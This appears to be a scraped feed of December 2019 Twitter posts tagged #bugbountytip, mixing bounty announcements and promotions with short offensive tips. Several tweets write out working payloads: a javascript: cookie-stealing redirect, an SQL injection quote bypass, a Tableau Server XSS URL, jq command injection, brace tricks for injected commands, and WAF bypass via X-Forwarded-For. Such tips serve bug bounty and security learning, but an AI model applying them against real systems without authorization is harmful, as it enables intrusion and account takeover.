5 Facebook Bug Bounty Resources by Philippe Harewood https://t.co/bpGdyUXc98 #Facebook #FB #BugBounty #bugbountytip #bugbountytips #EthicalHacking #EthicalHacker #Hacking #Hacker #Hackers #WhiteHat #WhiteHatHackers #AppSec #InfoSec #ITSecurity #CyberSecurity #Pentesting #Pentest https://t.co/hXoBqe1G5V
Avanish Pathak
@avanish46


2019-12-17 03:18:52
3 I earned $750 on @Bugcrowd . Capture the Account Creation Request On BurpSuite, Most of the case you'll find the redirect request in burp but not on the web : - [ https.//www.TARGET.com/account-created?redirectUrl=javascript:alert(document.cookie)// ] #bugbounty #bugbountytip https://t.co/Mxy2TieMIh
Ammar Amer🇸🇾
@cry__pto


2019-12-17 00:38:05
7 113 #OSINT TIPS created by me and the number of tips will get higher every day until it reach 1000 tips. New Updates. https://t.co/gNMSDGULS6 #Hacking #PenTest #bugbountytips #redteam #CyberSecurity #infosec #bugbountytip
Tirtha Mandal
@tirtha_mandal


2019-12-16 23:01:04
1 First time I successfully reproduced HTTP Dsync attack on a bug bounty program. Thank you @synack @SynackRedTeam 🤩😍 #synack #srt #redteam #bugbountytip #httpdsync https://t.co/zlPjFgXbHS
Ben Tai
@ben_tby


2019-12-16 21:07:28
4 Just a few days before I was simultaneously celebrating my first and second reward, and today I'm proudly celebrating my third reward. Thank you, @Hacker0x01 #BugBounty #bugbountytip #Hacking https://t.co/CcftdtdQya https://t.co/aADPguvhzk
bugbountytip
@a_l_e_r_t_1_


2019-12-16 18:05:36
0 https://t.co/pjFDcvvJCX i'm newbie on bug bounty. When i working i'm streamming on twitch. Please check my channel and follow me 😂. #bugbountytip #bugbounytips
Simpliv
@simplivllc


2019-12-16 16:00:07
1 This Self-paced Course Teaches You In Detail About [Ethical Hacking] Click Here To Sign Up #Hacking #Cybersecurity #bugbountytip #networking @StartGrowthHack @cry__pto @Pavandep8 @simplivllc https://t.co/6Q7g0olioK https://t.co/qEolSxBN7w
bug bounty tips - Retweet
@BugbountytipsR


2019-12-16 15:23:05
0 SQLi Without Quotes One of the BEST and SIMPLE BYPA$$ by @rodoassis username = \ password = INPUT2 SELECT * FROM login WHERE username = '{\' AND password = }'$INPUT2'; Part inside { } is considered as string https://t.co/mVDuuArf5Z #bugbountytips #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-16 14:51:19
0 If you are serious about making a living doing bug bounties or working as a penetration tester you may want to get a copy of my latest book. 💰HUGE KNOWLEDGE DROP 💰 https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #osint #infosec #redteam #hacking #pentest https://t.co/8tbkOCbFgM
Evgeny Larin
@godexmachine


2019-12-16 13:15:39
0 You can identify the Laravel framework by laravel_session cookie, then make a potential illegal request like POST, PUT, etc to check if debug mode is enabled. #BugBountyTip #BugBounty
TomNomNom
@TomNomNom


2019-12-16 11:00:27
9 If you need an element other than <a> for DOM Clobbering (i.e. one that returns an attribute value instead of '[Object HTMLElement]' when you call .toString() on it), you can use <area> with an href attribute #bugBountyTip https://t.co/YCSMhhPK61
noobSecurity
@noobsec_org


2019-12-16 07:17:12
6 https://t.co/7phSLNkWWL How we get $4000 in 5 minutes (Indonesian Language) #bugbounty #bugbountytip #bugbountytips #ittakesacrowd #togetherwehitharder
Laxmikant Bhumkar
@LuckyBhumkar


2019-12-16 00:09:51
0 Step by Step Bug Bounty by Nishant Saurav #bugbountytip https://t.co/0qTUn8I7Br
Elsadat ✪
@M0_SADAT


2019-12-15 00:38:20
3 I have submitted P1&P2 bugs more than 20 days and still no fix!! @santi_lopezz99 #bugbountytip PAY ME THEN DO THE DAMMN FIX! #bugbountylife #bugbounty #hacking #infosec
Max
@0xw2w


2019-12-14 23:01:10
2 @Hacker0x01 my.anotherdomain\@anotherdomain.com - 500 error my.anotherdomain^@anotherdomain.com - 302, accepted If you see that there are errors & your redirect not occurs but there are hints that this could work in particular cases, don't give up and continues fuzz! #bugbountytip #bugbounty
TheDelfX
@TheDelfX


2019-12-14 17:12:19
0 We are hackers. #hack #BugBounty #bugbountytip #software #hacking #hacker #hackerone https://t.co/29Q6mV643B
ghostlulz
@ghostlulz1337


2019-12-14 16:00:33
7 If you are serious about making a living doing bug bounties or working as a penetration tester you may want to get a copy of my latest book. 💰HUGE KNOWLEDGE DROP 💰 https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #osint #infosec #redteam #hacking #pentest https://t.co/1TiV1v7Ipm
Nm Kannan 🇮🇳
@cybrsadist


2019-12-14 14:28:33
2 Useful video for n00b bug hunters => https://t.co/KbiKnOA4mg by @InsiderPhD #bugbountytip #bugbounty #infosec #penetrationtesting
bug bounty tips - Retweet
@BugbountytipsR


2019-12-14 14:09:20
0 Gr8 Blind SQLi tips BUGH/*$$$$*/UNTER - Insert comment b/w string, if respond remain same then it is sqli Profile @gerben_javado WriteuP https://t.co/65svYcig2u Wonder Why @gerben_javado is not writing more blogs? #bugbountytip #bugbountytips
Sudoka
@sudo_sudoka


2019-12-14 08:05:24
1 Tableau Server #unauthenticated XSS, CVE-2019-19719, just visit: http://example[.]com/en/embeddedAuthRedirect.html?auth=javascript:alert("XSS") It's also an Open Redirect. #ThreatIntel #infosec #bugbounty #bugbountytip Let's search on Shodan: https://t.co/c4zhLFo9KK

@pouyana1


2019-12-14 06:53:55
0 sometimes you can rely on 'Last-Modified' header to recognize software version, useful for finding available public exploits. #bugbountytips #bugbounty #bugbountytip
Shantanu Kulkarni
@shantanukul_


2019-12-14 06:35:01
7 6k hackerone disclosed reports at one place. https://t.co/3Dod4cwLHj #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone #bugcrowd

@pouyana1


2019-12-13 18:17:29
1 Use x-forwarded-for to bypass WAF ip based limitations. #bugbountytip #bugbounty #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-13 04:06:34
0 Cross Site Request Forgery: Techniques https://t.co/3N7hAtbbFP #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
Selim Enes Karaduman
@Enesdex


2019-12-12 18:55:51
0 Always check for location.hash and location.href if these js codes are going into any sink without encoding it's Dom XSS E.g var hash = location.href .....innerHTML = hash #bugbountytip #bugbountytips #BugBounty
Pflash Punk
@PflashPunk


2019-12-12 18:48:25
0 I just published SSRF via FFmpeg HLS processing https://t.co/NISu4rr8Ik #bugbounty #bugbountytips #bugbountytip
Halil AHMAD
@Halilahmadd


2019-12-12 18:06:10
0 After a nice stored xss I prepared my report.I hope everything will be fine. #BugBounty #BugBountyTip #Hackerone @Hacker0x01 @GoogleVRP https://t.co/gEmljQEZd9
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 台風
@spyerror


2019-12-12 17:47:49
0 @Aksam funny, i think you are sleeping 😴 #BugBounty #BugBountyTip #WAF #infosec https://t.co/kExJ2STUK2
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-12 17:17:17
0 When the screens went black: How NotPetya taught Maersk to rely on resilience – not luck – to mitigate future cyber-attacks https://t.co/ECnt63vXqE #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil
YogoshaOfficial
@YogoshaOfficial


2019-12-12 14:15:14
3 [#bugbountytip] Found staging application that give you access to a privilege account with default credz, make sure to reuse this domain cookies to the main domain (prod), you can easily access as privileged user. @TnMch_ & Get ready for #yogoshachristmaschallenge next monday !
bug bounty tips - Retweet
@BugbountytipsR


2019-12-12 13:56:24
0 TIP: IF you DON'T like the RESPOND of SERVER INTERCEPT RESPOND CHANGE IT use BURP Changed Respond to Bypass Auththentication by John Simon Profile https://t.co/m6mB5kZ7lh WriteuP https://t.co/K1SbMWjDfq #bugbountytip #bugbountytips #writeup #hacking
Zero Xyele
@zeroxyele


2019-12-12 11:59:11
0 I released new tool for extracting api keys and secrets. https://t.co/YqD2Cac6iy #bugbounty #bugbountytip #bugbountytips #hackerone #hacker101 #bugcrowd https://t.co/jzAuhGY7b8
Sunil
@Sunilkande1137


2019-12-12 06:16:33
1 Recon Resources https://t.co/W7NLDe4PNJ https://t.co/xj3JvFgojf https://t.co/Gx4sx1ZoPM https://t.co/gFAXmz3t34 #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #ITsecurity #websecurity #appsec #hacker #security #Hackers #bugbountytips #bugbountytip
Mashoud1122
@mashoud1122


2019-12-12 04:17:01
1 Command exec in JQ cat file.json | jq .[;whoami;] returns error with command executed. #bugbountytip #bugbountytips #BugBounty #infosec #Security
Sunil
@Sunilkande1137


2019-12-12 01:25:04
4 6000 hackerone disclosed reports at one place. https://t.co/bxvXpnVitp #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-11 20:11:29
0 @idontkn85445458 @Dondata4 - As this is a post based you need to create a html csrf to trigger xss. - Just use burpsuite CSRF generator. - Save it as .html file. - Open the .html file it triggers XSS🎉️ #bugbountytip
Sunil
@Sunilkande1137


2019-12-11 19:13:07
3 6000 hackerone disclosed reports at one place. https://t.co/bxvXpnVitp #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 14:18:36
0 Use this link https://t.co/MWpV7kbFdO #bugbountytip #bugbountytips https://t.co/2suoUC9DK3
Tragger Osbourne🧐
@OsbourneTragger


2019-12-11 13:52:31
0 We all know @bishopfox is a team full of slayersBe sure to check out their latest write up where they identified 9 vulnerabilities in the Solishmed app #bugbounty #bugbountytip #bugbountytips #infosec #redteam #osint https://t.co/sNVecQJVRj
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-11 13:39:36
0 Escalate CRLF to RCE, I got this chain in my dreams⛷️, i think it won't, at least not very often :P #bugbountytip CRLF -> X-HTTP-Method-overide:PUT -> Shell
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 12:56:47
1 XSS is like evil God who is everwhere Xss Hunter @AnasIsHere Xss Like Pro at https://t.co/a47iwf9j9f #bugbountytips #bugbounty #bugbountytip #hacking #writeup #xss
ghostlulz
@ghostlulz1337


2019-12-11 12:46:24
3 Everyone knows @bishopfox is a team full of slayers. Be sure to check out their latest write up where they identified 9 vulnerabilities in the Solishmed application. https://t.co/OtxduAPoSM #bugbounty #bugbountytip #bugbountytips #infosec #redteam #osint
D Ξ Ξ P Λ K ⚙️
@Deepak_maxx


2019-12-11 12:43:40
0 If you got 10 stored XSS on the same application! How would you report it and why? I'm sure everyone will have their own opinions & experiences regarding this! #bugbounty #bugbountytips #bugbountytip
ZracheSs-AnasZ
@ZrariAnas


2019-12-11 08:12:03
0 If you didn’t already subscribe to @spaceraccoonsec blog posts! Go now, do it.. Come on, don’t question reason, just do it. Trust me, you’ll like it. I love you and you love me, then go do it. Subscribe, it’s free... No reason not to. Stop reading already!!??? #bugbountytip https://t.co/A7MeCBTLaA https://t.co/IGbatoBAAM
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 03:59:08
0 Beginners miss to chk source code for XSS and they never find out that it is easy #easy #bugbountytip #bugbountytips #hacking https://t.co/QM6gs3Ijpi
Sajjad Arshad
@sajjadium


2019-12-11 03:34:14
0 @USENIXSecurity @fransrosen @dawidczagan @orange_8361 @irsdl @garethheyes @NahamSec @ldionmarcil @nj_dav @jobertabma check out new ways of exploiting #WebCacheDeception using #PathConfusion techniques! #togetherwehitharder #bugbounty #bugbountytip #bugbountytips @Hacker0x01 @TheHackersNews
Ammar Amer🇸🇾
@cry__pto


2019-12-10 17:34:59
5 -List of some Penetration Testing Tools.pdf: https://t.co/sN2lkjt1Uh -In Plain Sight:1: Vulnhub Walkthrough.pdf: https://t.co/F2zf4eJK6n -A cheat-sheet for password crackers.pdf https://t.co/XQQxCJ99wQ #bugbountytip #redteam #PenTest #Hacking #cybersecurity #BugBounty #OSINT
Mourad
@SecuAudit


2019-12-10 15:56:36
0 i reported a critical bug in a 3rd party website company confirmed that this is critical even if is out of scope ,HackerOne Staff despite this insists that this is not critical and updated the severity from Critical to Medium #750138 #BugBounty #bugbountytip @Hacker0x01 😟
0day work
@0daywork


2019-12-10 15:53:28
1 #Bugbountytip Look for #API keys in the documentation or screenshots of blog posts. Sometimes those are *not* (entirely) redacted and still valid employee's credentials, giving you access to some juicy endpoints ;-) #Bugbounty #OWASP #ITSecurity https://t.co/V91tslWu3Y
Skyper 💻
@SkypLabs


2019-12-10 00:33:05
2 Get the #ASN of a company: https://t.co/pi8II54BuN #Security #Hacking #BugBounty #BugBountyTip #BugBountyTips #Shodan
Alessandro Brucato
@_brucedh


2019-12-09 17:17:36
0 Any idea how to trigger an XSS into the body of a 301 redirect? @s0md3v @uraniumhacker @iamnoooob @brutelogic #bugbountytip https://t.co/dmW1q4hwTv
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-09 16:21:04
4 🏆🏆Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/4iR3cX3qyf
intigriti
@intigriti


2019-12-09 13:08:32
12 Did you know you can use OpenSSL for recon purposes? 🔒😏 Thanks for the #BugBountyTip, @michael1026h1! https://t.co/mRraH8cK2z
Mohammed Shine
@MohammedShine8


2019-12-09 11:44:16
6 Got stuck with spaces in command Injection? Use {} to eliminate spaces while using commands. Eg: {ping,127.0.0.1} {ip,addr} {ls,-al} #bugbounty #bugbountytip #infosec #commandinjection #cmdi #vapt #hacker
dark_warlord14
@dark_warlord14


2019-12-09 11:42:17
1 Opened a web page on Firefox and left to get coffee. Came back in a minute to find that sweet XSS popup by @knoxss_me just lying there. @brutelogic will amaze you every time. #bugbountytip Try @knoxss_me sand save time looking for XSS manually. https://t.co/4ppKTLDCeN
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-09 08:47:33
0 💰Keep Following Us 💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone https://t.co/DwvuqYv30k
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-09 08:43:54
0 True Story When Hacking the Neighbourhood WiFi — Tutorial Coming Soon 💰💰 Keep Following Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/P5VyKxUU81
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-09 08:41:28
0 HOF Comming Soon ! Keep Following ! Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil https://t.co/3GBqgjOgP4
robre
@_robre


2019-12-09 00:43:25
0 Create your own wordlists and be creative with them. If you’re just using seclists like everyone else, you will only find what everyone else is finding. #bugbountytip #bugbountytips
Rafin Rahman Chy
@rafinrahmanchy


2019-12-08 18:15:45
3 Information Gathering Methodologies *Social Engineering *Doxing *OSINT *Advanced Google Search/Google Hacking *DNS Enumeration *Internet Archive *Dumpster Diving #CyberSecurity #InfoSec #EthicalHacking #EthicalHacker #Hacking #Hacker #Pentesting #Recon #BugBounty #bugbountytip https://t.co/bVcvwskY8a
Tragger Osbourne
@OsbourneTragger


2019-12-08 15:06:59
0 firebase database It’s one of the easier win for #BugBoundy you can easily look for it on google using Site:.firebaseio.com/.json but google doesn’t give you results but if use bing you can get results Google knows the problem #togetherwehitharder #BugBounty #bugbountytip https://t.co/fMSc8J6lM1
Rafin Rahman Chy
@rafinrahmanchy


2019-12-08 15:01:12
11 The best guideline to become an Ethical Hacker I've ever read https://t.co/BMrOc4hH51 #CyberSecurity #InfoSec #infosecjobs #InfoSecurity #ITSecurity #EthicalHacking #EthicalHacker #Hacking #Hacker #Hackers #WhiteHat #BugBounty #bugbountytip #bugbountytips #Pentesting #Pentester
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-08 10:21:34
0 Ginp - A malware patchwork borrowing from Anubis Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting https://t.co/AzgReUIeLf
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-08 10:15:48
0 Breaking Mimblewimble’s Privacy Model Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/5gDbIPnmFH
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-08 10:07:55
2 Free Giveaway -- Free Programming Ebooks Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/7kp48r2kcA
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-08 10:00:40
3 Introducing Flan Scan: Cloudflare’s Lightweight Network Vulnerability Scanner -- Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 https://t.co/OSiQlEhTHi #BugBounty #BugBountyTip #bugbountytips
Terminal Jockey
@TerminalJockey


2019-12-08 04:03:53
1 I wrote a tool to help me learn bash! Simple script to do a little dns enum then crawls results for dirs found in the robots.txt file. Will be adding functionality, open to critique! https://t.co/PmlCbFedDE #bugbounty #infosec #ctf #bugbountytips #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2019-12-07 23:54:02
2 i have finished building my github repository which talk about #OSINT.a very important repository for ethical hackers and and #BugBounty hunters and of course #OSINT lovers the repository for now contain 100 tips and it will get daily updates https://t.co/gNMSDGULS6 #bugbountytip
Samet ŞAHİN
@sametsahinnet


2019-12-07 18:14:21
2 Here is a blog and trick about : "Javascript File Inclusion via a Simple Link Injection" #bugbountytip : Even a Simple Link Injection can be very harmful. Depends on where it is. https://t.co/TcOpslYuvE https://t.co/ks5NJDD3ss
Zero Xyele
@zeroxyele


2019-12-07 12:28:31
0 I Got URLs https://t.co/K5qmVWfEs0 #hackerone #hacker101 #bugbounty #bugbountytips #bugbountytip #bugcrowd https://t.co/X7J2nk2dyz
xaeroborg
@xaeroborg


2019-12-07 12:09:05
0 resource #bugbountytips #bugbountytip https://t.co/kSxeWPYqWe
Hendrik
@hendrikvb


2019-12-07 07:11:49
0 #bugbountytip Add #corsy to your #CSRF recon, complement with #bolt, both by @s0md3v. #bugbounty #Pentesting
ghostlulz
@ghostlulz1337


2019-12-07 01:52:08
1 Most hunters freeze up when they get a piece of source code to analyze. Source code analysis can help you find a lot of bugs which are missed by black box style testing. Don't miss easy XSS. More info in my blog: https://t.co/Ke274Lvc9e #BugBounty #bugbountytips #bugbountytip https://t.co/E1XFw9H9Nc
ghostlulz
@ghostlulz1337


2019-12-06 20:40:05
10 If you're looking to make money bug bounty hunting you may want to get a copy of my book. Nothing is better than getting paid to do what you love! https://t.co/Z1FwTfiskG #BugBounty #bugbountytips #bugbountytip #infosec #appsec #osint #xss #pentest #redteam #cybersecurity https://t.co/CSTWdrUaD2
CyberTheReapeR☢
@CyberTheReapeR5


2019-12-06 20:39:18
1 what is xss payload for akamai waf bypass?? #hackerone #bugcrowd #infosec #bugbountytips #bugbountytip #xss #hacking
dos_kid
@kid_dos


2019-12-06 18:12:15
0 #bugbountytip Look twice before submitting reports especially for Information disclosures 😓
bugbountytip
@a_l_e_r_t_1_


2019-12-06 09:12:09
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby https://t.co/amLbKREucw
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-06 06:03:58
6 Type of Cyber Attacks 🦞 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/MZpyBpq6C4
Ammar Amer🇸🇾
@cry__pto


2019-12-06 03:06:03
6 -Windows Notes + Cheatsheet.pdf: https://t.co/lVxi7uImty -Windows Privilege Escalation Fundamentals.pdf: https://t.co/raueoqhVVH -Linux Notes + Cheatsheet.pdf: https://t.co/rrdCBWkbOT -Docker for Pentesters.pdf: https://t.co/Wl6qXHe6XI #bugbountytip #redteam #PenTest #Hacking
bayani elogada
@metamudkip


2019-12-06 02:14:16
0 If you're discouraged from joining unrewarding bug bounty programs, listen to @JessieJ: "We're paying with love tonight." #bugbounty #bugbountytip
fadetoblack
@hardweired


2019-12-05 19:59:55
0 If you're Testing for SSRF or blind XXE and it should takes time to be executed or Invalidated redirections to steal tokens : https://t.co/uHMg4rJD69 This tool is awesome to Test for those kind of bugs #bugbountytips #bugbountytip https://t.co/efC5pv0SZ4
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-12-05 18:43:44
0 Is their anything more beautiful than this in bug bounty #bugbounty #bugbountytip thanks @h1_sp1d3r @hakluke @stokfredrik @Rhynorater https://t.co/z6iavoWzgc
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-05 16:25:09
1 #bugbountytip Detect Unix Command injectio Payloads: https://t.co/Jz35dKi8KS Detect in response: regexp for burp suite. https://t.co/J0bS7ViC9C And 30 secod delay. It is all.
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 14:17:45
0 OnePlus #Breached Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/VVsLLbfvum
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 14:14:39
1 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/yJGb5KrEnU
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 14:14:21
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/mzFcIOkL8E
Rafin Rahman Chy
@rafinrahmanchy


2019-12-05 13:24:00
1 Facebook Bug Bounty Blogs/WriteUps : https://t.co/CKdsEXouCz https://t.co/rzoYk67VS6 https://t.co/xeQiLCoQbM https://t.co/7y70R706W1 https://t.co/E96wwBPfc6 https://t.co/hfAsZqb9tI https://t.co/ZxPANapI5l https://t.co/SJGiC0xChE https://t.co/d57e8Seq9m #BugBounty #bugbountytip https://t.co/L02NnprDQB
Anas Mahmood 🇵🇰
@AnasIsHere


2019-12-05 12:28:29
6 #XSS like a Pro 😎 Just published another interesting writeup. Must read the full blog post Writeup: https://t.co/HlXk9esUv3 #BugBounty #BugBountyTip #Hacking #vulnerability
TvM
@tvmpt


2019-12-05 12:12:22
0 Quick and dirty way to import a big url list into burpsuite cat file | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s #quickanddirtytip #bugbountytip #oneliner #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 09:14:20
7 Cross Site Scripting Basics - #XSS https://t.co/0wdvBhdOHw Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 09:06:33
0 >> kali-undercover To Start #UNDERCOVER Mode in Kali 2019.4 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/F5IhdmmCzF
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 09:04:28
0 Update Your Kali and Get the Kali Undercover mode that looks like Windows OS ! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/o7JrVLrhGx
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 09:01:35
0 PyXie Rat - Python Rat to Escalate Windows Permissions Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/eFwqj2ozDj
bugbountytip
@a_l_e_r_t_1_


2019-12-05 08:29:09
0 6 download for 50 + . GOOD HACKING !!! #bugbountytips #bugbountytip
Ajay Gautam
@evilboyajay


2019-12-05 07:06:04
4 I discovered a new kind of web application authentication bypass by accident while doing pentest and thought of sharing with you all <3 #infosecmatters #ethicalhacking #informationsecurity #cybersecurity #infosec #bugbountytip https://t.co/cFnTkaEFG2
ph0rensic
@ph0rensic


2019-12-05 01:15:20
0 I received $ 900 in a private program Hackerone! There is still time to hit the goal! I needed some arguments with the evaluator, always research what you're debating! https://t.co/TDQWkEfNMq #BugBounty #bugbountytip
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-05 00:30:46
0 #bugbountytip 99.99% of xss on public programs is dumpicates I got it
robre
@_robre


2019-12-04 21:06:25
1 @NathOnSecurity Hey little tip: open two windows of acunetix, double your income. #bugbountytip
@cr33pb0y
@theyiyibest


2019-12-04 20:05:09
0 Yay, I was awarded a 4 x $X00 bounty on @Hacker0x01! https://t.co/7vrkzfnbNA #TogetherWeHitHarder Recipe to this one: - Google Dorks - XSS reflected - Repeat first step. #bugbounty #bugbountyprogram #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-04 18:58:36
0 Maximise Bug Bounty Scope - Gather Subdomains using Facebook Certificate Transparency https://t.co/AjSRBqt57p #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone
intigriti
@intigriti


2019-12-04 15:47:09
9 ⚠️Open staging environments can lead to production account takeover ✔️If they use a separate DB, but same JWT secret ✔️If the username or e-mail address is used as identifier This is an excellent #BugBountyTip, thanks @kapytein! https://t.co/yZkBoDBO1d
Tragger Osbourne
@OsbourneTragger


2019-12-04 15:24:58
0 apps,I realized after reverse engineer,using tool like apktool,I was app to look at the AndroidManifest see all permissions, which often lead to stringxml where I would find content delivery ,login ID & pass,fB tokens,googleapi, #bugbountytips #bugbountytip #togetherwehitharder https://t.co/ZBq3acOAoI
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-04 12:19:07
1 #bugbountytip All in one for Bug Bounty Hunters and pentesters https://t.co/lRPVHMHKAo
Ammar Amer🇸🇾
@cry__pto


2019-12-04 00:37:38
3 -Pen-testing resources.pdf: https://t.co/eykvQfDT5g -Shellcode: Encrypting traffic.pdf: https://t.co/QMsNonNYPZ -huge list of pentest tookit.pdf: https://t.co/LM0XUQb2AI -Information Gathering with theHarvester.pdf: https://t.co/ZFWOVqotm6 #bugbountytip #Hacking #osint #redteam
Tragger Osbourne
@OsbourneTragger


2019-12-03 22:31:18
0 I just find a bug 🐜 on android app Using firebase , I use apktool Then I look for AndroidManifest.xml , I found firebase they , I look for address in string.xml , I found firebase database and api keys 🔑 #bugbountytip #bugbountytips #togetherwehitharder

@pouyana1


